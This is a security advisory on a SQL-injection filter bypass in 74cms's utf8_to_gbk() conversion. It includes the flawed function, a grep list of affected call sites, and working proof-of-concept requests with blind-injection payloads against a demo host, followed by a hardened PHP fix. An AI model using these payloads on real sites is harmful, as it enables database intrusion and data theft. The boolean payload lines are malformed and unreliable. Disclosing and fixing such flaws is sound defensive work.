74cms (20141020) global SQL injection filter bypass
Version: 74cms_v3.5.20.20151120
An attacker can bypass the global SQL injection filter.
The conversion function utf8_to_gbk() is defined as follows:
    function utf8_to_gbk($utfstr) {
        global $UC2GBTABLE;
        $okstr = '';
        // Lazily load the Unicode -> GB code table (one "gbcode unicode" pair per line).
        if(empty($UC2GBTABLE)) {
            define('CODETABLEDIR', dirname(__FILE__).DIRECTORY_SEPARATOR.'encoding'.DIRECTORY_SEPARATOR);
            $filename = CODETABLEDIR.'gb-unicode.table';
            $fp = fopen($filename, 'rb');
            while($l = fgets($fp,15)) {
                $UC2GBTABLE[hexdec(substr($l, 7, 6))] = hexdec(substr($l, 0, 6));
            }
            fclose($fp);
        }
        $okstr = '';
        $ulen = strlen($utfstr);
        for($i=0; $i<$ulen; $i++) {
            $c = $utfstr[$i];
            $cb = decbin(ord($utfstr[$i]));
            // Any byte >= 0x80 has an 8-digit binary form and is treated as a lead byte.
            if(strlen($cb)==8) {
                // Defect: ord($cb) is the code of the first *character* of the binary
                // string ('1' = 49 = 0b110001), so $csize is always 2, whatever the
                // lead byte actually is. The next two bytes are consumed blindly,
                // with no check that they are continuation bytes or even exist.
                $csize = strpos(decbin(ord($cb)),'0');
                for($j = 0; $j < $csize; $j++) {
                    $i++;
                    $c .= $utfstr[$i];
                }
                $c = utf8_to_unicode($c);
                if(isset($UC2GBTABLE[$c])) {
                    // Mapped character: emit the two GBK bytes.
                    $c = dechex($UC2GBTABLE[$c]+0x8080);
                    $okstr .= chr(hexdec($c[0].$c[1])).chr(hexdec($c[2].$c[3]));
                } else {
                    // Unmapped code point: emit it as a numeric HTML entity.
                    $okstr .= '&#'.$c.';';
                }
            } else {
                // ASCII byte: copied through unchanged.
                $okstr .= $c;
            }
        }
        $okstr = trim($okstr);
        return $okstr;
    }
However, this conversion code still allows SQL injection.
For example, if the input is %88%ec%27, the global filter escapes the quote and turns it into
%88%ec%5c%27.
utf8_to_gbk() then treats the three bytes %88 %ec %5c as a single multibyte character (the backslash inserted by the filter is swallowed as a continuation byte), looks it up in the GB table, finds no mapping, and emits it as the entity &#35612;. The trailing %27 is copied through unchanged, so the result is &#35612;' with an unescaped single quote.
In principle, every code path that passes data through utf8_to_gbk() and then into a SQL statement is affected.
# grep -nr utf8_to_gbk .
./user/company/company_info.php:26: $setsqlarr['companyname'] = trim($_POST['companyname']) ? utf8_to_gbk(trim($_POST['companyname'])) : exit('?????????????????');
./user/company/company_info.php:29: $setsqlarr['nature_cn'] = utf8_to_gbk(trim($_POST['nature_cn']));
./user/company/company_info.php:31: $setsqlarr['trade_cn'] = utf8_to_gbk(trim($_POST['trade_cn']));
./user/company/company_info.php:34: $setsqlarr['district_cn'] = utf8_to_gbk(trim($_POST['district_cn']));
./user/company/company_info.php:38: $setsqlarr['street_cn'] = utf8_to_gbk(trim($_POST['street_cn']));
./user/company/company_info.php:40: $setsqlarr['scale'] = trim($_POST['scale']) ? utf8_to_gbk(trim($_POST['scale'])) : exit('?????????????');
./user/company/company_info.php:41: $setsqlarr['scale_cn'] = utf8_to_gbk(trim($_POST['scale_cn']));
./user/company/company_info.php:42: $setsqlarr['registered'] = utf8_to_gbk(trim($_POST['registered']));
./user/company/company_info.php:43: $setsqlarr['currency'] = utf8_to_gbk(trim($_POST['currency']));
./user/company/company_info.php:44: $setsqlarr['address'] = trim($_POST['address']) ? utf8_to_gbk(trim($_POST['address'])) : exit('???? Why ???????');
./user/company/company_info.php:46: $setsqlarr['contact'] = trim($_POST['contact']) ? utf8_to_gbk(trim($_POST['contact'])) : exit('???? Why ??????');
./user/company/company_info.php:48: $setsqlarr['telphone'] = trim($_POST['telphone']) ? utf8_to_gbk(trim($_POST['telphone'])) : exit('???? Parameters ???? ??');
./user/company/company_info.php:50: $setsqlarr['email'] = trim($_POST['email']) ? utf8_to_gbk(trim($_POST['email'])) : exit('???? Why ???????');
./user/company/company_info.php:52: $setsqlarr['website'] = utf8_to_gbk(trim($_POST['website']));
./user/company/company_info.php:54: $setsqlarr['contents'] = trim($_POST['contents']) ? utf8_to_gbk(trim($_POST['contents'])) : exit('???? Why ?????? Comment');
./user/user_report_resume.php:189: $setsqlarr['content'] = utf8_to_gbk($setsqlarr['content']);
./user/user_report_resume.php:190: $setsqlarr['title'] = utf8_to_gbk($setsqlarr['title']);
./user/user_apply_jobs.php:302: $addarr['note'] = utf8_to_gbk($addarr['note']);
./user/user_invited.php:347: $addarr['note'] = utf8_to_gbk($addarr['note']);
./user/personal/personal_resume.php:244: $setsqlarr['title'] = trim($_POST['title']) ? utf8_to_gbk(trim($_POST['title'])) : "delta ????????";
./user/personal/personal_resume.php:246: $setsqlarr['fullname'] = trim($_POST['fullname']) ? utf8_to_gbk(trim($_POST['fullname'])) : exit('???? Why ??????');
./user/personal/personal_resume.php:250: $setsqlarr['sex_cn'] = utf8_to_gbk(trim($_POST['sex_cn']));
./user/personal/personal_resume.php:252: $setsqlarr['residence'] = trim($_POST['residence']) ? utf8_to_gbk(trim($_POST['residence'])) : exit('????????????');
./user/personal/personal_resume.php:253: $setsqlarr['residence_cn'] = utf8_to_gbk(trim($_POST['residence_cn']));
./user/personal/personal_resume.php:255: $setsqlarr['education_cn'] = utf8_to_gbk(trim($_POST['education_cn']));
./user/personal/personal_resume.php:257: $setsqlarr['experience_cn'] = utf8_to_gbk(trim($_POST['experience_cn']));
./user/personal/personal_resume.php:258: $setsqlarr['email'] = trim($_POST['email']) ? utf8_to_gbk(trim($_POST['email'])) : exit('???? Parameters ????');
./user/personal/personal_resume.php:263: $setsqlarr['householdaddress_cn'] = utf8_to_gbk(trim($_POST['householdaddress_cn']));
./user/personal/personal_resume.php:265: $setsqlarr['marriage_cn'] = utf8_to_gbk(trim($_POST['marriage_cn']));
./user/personal/personal_resume.php:266: $setsqlarr['intention_jobs'] = utf8_to_gbk(trim($_POST['intention_job']));
./user/personal/personal_resume.php:268: $setsqlarr['trade_cn'] = utf8_to_gbk(trim($_POST['trade_cn']));
./user/personal/personal_resume.php:271: $setsqlarr['district_cn'] = utf8_to_gbk(trim($_POST['district_cn']));
./user/personal/personal_resume.php:273: $setsqlarr['nature_cn'] = utf8_to_gbk(trim($_POST['nature_cn']));
./user/personal/personal_resume.php:275: $setsqlarr['wage_cn'] = utf8_to_gbk(trim($_POST['wage_cn']));
./user/personal/personal_resume.php:394: $school = utf8_to_gbk(trim($_POST['school']));
./user/personal/personal_resume.php:395: $speciality = utf8_to_gbk(trim($_POST['speciality']));
./user/personal/personal_resume.php:396: $education_cn = utf8_to_gbk(trim($_POST['education_cn']));
./user/personal/personal_resume.php:496: $companyname = utf8_to_gbk(trim($_POST['companyname']));
./user/personal/personal_resume.php:497: $jobs = utf8_to_gbk(trim($_POST['jobs']));
./user/personal/personal_resume.php:498: $achievements = utf8_to_gbk(trim($_POST['achievements']));
./user/personal/personal_resume.php:601: $agency = utf8_to_gbk(trim($_POST['agency']));
./user/personal/personal_resume.php:602: $course = utf8_to_gbk(trim($_POST['course']));
./user/personal/personal_resume.php:603: $description = utf8_to_gbk(trim($_POST['description']));
./user/plus/ajax_user.php:32: $username = utf8_to_gbk($username);
./user/plus/ajax_user.php:33: $password = utf8_to_gbk($password);
./user/plus/ajax_user.php:41: $postcaptcha = utf8_to_gbk($postcaptcha);
./user/plus/ajax_user.php:73: $postcaptcha = utf8_to_gbk($postcaptcha);
./user/plus/ajax_user.php:87: $username = utf8_to_gbk($username);
./user/plus/ajax_user.php:88: $password = utf8_to_gbk($password);
./user/plus/ajax_user.php:134: $usname = utf8_to_gbk($usname);
./user/plus/ajax_user.php:157: $email = utf8_to_gbk($email);
./user/user_report.php:189: $setsqlarr['content'] = utf8_to_gbk($setsqlarr['content']);
./user/user_report.php:190: $setsqlarr['jobs_name'] = utf8_to_gbk($setsqlarr['jobs_name']);
./wap/company/wap_company_jobs.php:83: $_POST = array_map("utf8_to_gbk", $_POST);
./wap/company/wap_company_jobs.php:324: $_POST = array_map("utf8_to_gbk", $_POST);
./wap/company/wap_user.php:49: $_POST = array_map("utf8_to_gbk", $_POST);
./wap/personal/wap_apply.php:46: $_POST = array_map("utf8_to_gbk", $_POST);
./wap/personal/wap_user.php:93: $_POST = array_map("utf8_to_gbk", $_POST);
./wap/personal/wap_user.php:231: $_POST = array_map("utf8_to_gbk", $_POST);
./wap/personal/wap_user.php:294: $_POST = array_map("utf8_to_gbk", $_POST);
./wap/personal/wap_user.php:335: $_POST = array_map("utf8_to_gbk", $_POST);
./wap/personal/wap_user.php:410: $_POST = array_map("utf8_to_gbk", $_POST);
./wap/personal/wap_user.php:481: $_POST = array_map("utf8_to_gbk", $_POST);
./wap/personal/wap_user.php:539: $_POST = array_map("utf8_to_gbk", $_POST);
./wap/personal/wap_user.php:643: $_POST = array_map("utf8_to_gbk", $_POST);
./include/common.fun.php:934: function utf8_to_gbk($utfstr) {
./plus/ajax_search_location.php:18: $_GET['key'] = utf8_to_gbk($_GET['key']);
./plus/ajax_simple.php:266: $pwd = utf8_to_gbk($pwd);
./plus/weixin.php:36: $keyword = utf8_to_gbk($keyword);
./plus/ajax_common.php:69: $gbk_query = utf8_to_gbk($gbk_query);
./plus/ajax_street.php:48: if(strcasecmp(QISHI_DBCHARSET, "utf8") != 0) $key = utf8_to_gbk($key);
./plus/ajax_user.php:32: $username = utf8_to_gbk($username);
./plus/ajax_user.php:33: $password = utf8_to_gbk($password);
./plus/ajax_user.php:41: $postcaptcha = utf8_to_gbk($postcaptcha);
./plus/ajax_user.php:73: $postcaptcha = utf8_to_gbk($postcaptcha);
./plus/ajax_user.php:87: $username = utf8_to_gbk($username);
./plus/ajax_user.php:88: $password = utf8_to_gbk($password);
./plus/ajax_user.php:134: $usname = utf8_to_gbk($usname);
./plus/ajax_user.php:157: $email = utf8_to_gbk($email);
We will not try every call site here; one or two are enough to verify the issue:
1:
http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%88%ec%27
The SQL error returned:
Error: Query error: SELECT * FROM qs_hotword WHERE w_word like '%&#35612;'%' order BY 'w_hot' desc limit 0, 10
Boolean-based (AND/OR) injection gets past the WAF and reveals the result of user():
If the condition is FALSE, all hotwords are returned:
http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%88%ec%27%20or%20strcmp(substr(user(),114,111,111,116),char(64,108,111,108,104,111,115,115,))%23
If it is TRUE, no results are returned:
http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%88%ec%27%20or%20strcmp(substr(user(),114,111,111,116),char(64,108,111,108,104,111,115,116,))%23
user() = root@localhost
2:
http://demo.74cms.com/plus/ajax_user.php?act=check_usname
POST: usname=%88%ec%27
Returned error:
Error: Query error: select * from qs_members where username='&#35612;'' LIMIT 1
Solution:
Fix utf8_to_gbk() itself, and do not rely on the global filter alone to protect SQL statements.
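As an added example (this is not 74cms code), here is what that solution could look like in PHP: a replacement conversion that rejects malformed UTF-8 and leaves the table lookup to mbstring, so no hand-rolled byte counting can swallow a backslash, and the check_usname lookup from ajax_user.php rewritten as a prepared statement so that escaping is done by the driver for the connection charset rather than by a global filter applied before conversion. Assumptions: PHP 7 or later with the mbstring and mysqli extensions, a mysqli connection on which set_charset('gbk') has already been called, a source file saved as UTF-8, and the table and column names shown on this page; utf8_to_gbk_safe(), check_usname() and self_check() are names chosen for this example.

```php
<?php
// Added example, not 74cms code. Hardened replacement for utf8_to_gbk() and
// the query pattern that should sit behind it.

/**
 * Convert UTF-8 to GBK without the defects of the original:
 *  - the input is validated first, so a lone 0x88 lead byte (or any other
 *    malformed sequence) is rejected instead of being re-emitted as "&#N;"
 *    next to a quote that the global filter believed it had escaped;
 *  - multibyte sequences are never decoded by hand, so a 0x5C backslash can
 *    not be consumed as a continuation byte.
 */
function utf8_to_gbk_safe(string $utfstr): string
{
    if (!mb_check_encoding($utfstr, 'UTF-8')) {
        throw new InvalidArgumentException('input is not well-formed UTF-8');
    }
    // Code points with no GBK mapping become mbstring's substitute character
    // ('?' by default) rather than an HTML entity, so the output can never
    // acquire bytes that were not in the input.
    return mb_convert_encoding($utfstr, 'GBK', 'UTF-8');
}

/**
 * The check_usname lookup with the converted value bound as a parameter.
 * Assumes $db->set_charset('gbk') was called when the connection was opened,
 * so the driver escapes for the same charset the column uses.
 */
function check_usname(mysqli $db, string $raw): bool
{
    $usname = utf8_to_gbk_safe(trim($raw));
    $stmt = $db->prepare('SELECT * FROM qs_members WHERE username = ? LIMIT 1');
    $stmt->bind_param('s', $usname);
    $stmt->execute();
    $stmt->store_result();
    $exists = $stmt->num_rows > 0;
    $stmt->close();
    return $exists;
}

/**
 * Offline self-check on constructed inputs (no database needed):
 *  - the exact bytes the global filter produced in the write-up,
 *    %88%ec%5c%27, must be rejected as malformed UTF-8;
 *  - ordinary Chinese text converts to its GBK bytes and an ASCII quote
 *    passes through unchanged, so legitimate input still works.
 */
function self_check(): bool
{
    $after_filter = "\x88\xec\\'";   // constructed: %88 %ec %5c %27
    try {
        utf8_to_gbk_safe($after_filter);
        return false;                 // must not get here
    } catch (InvalidArgumentException $e) {
        // expected: 0x88 is not a valid UTF-8 lead byte
    }
    // "中文" is D6D0 CEC4 in GBK; the trailing quote stays a single 0x27.
    return utf8_to_gbk_safe("中文'") === "\xd6\xd0\xce\xc4'";
}

echo self_check() ? "self-check passed\n" : "self-check FAILED\n";
```

The order of operations is the point: convert first, then let the database driver escape (or bind) in the charset the connection actually uses. Any filter that escapes before a byte-level conversion is reasoning about bytes that the conversion is about to rearrange, which is exactly the gap the write-up exploits.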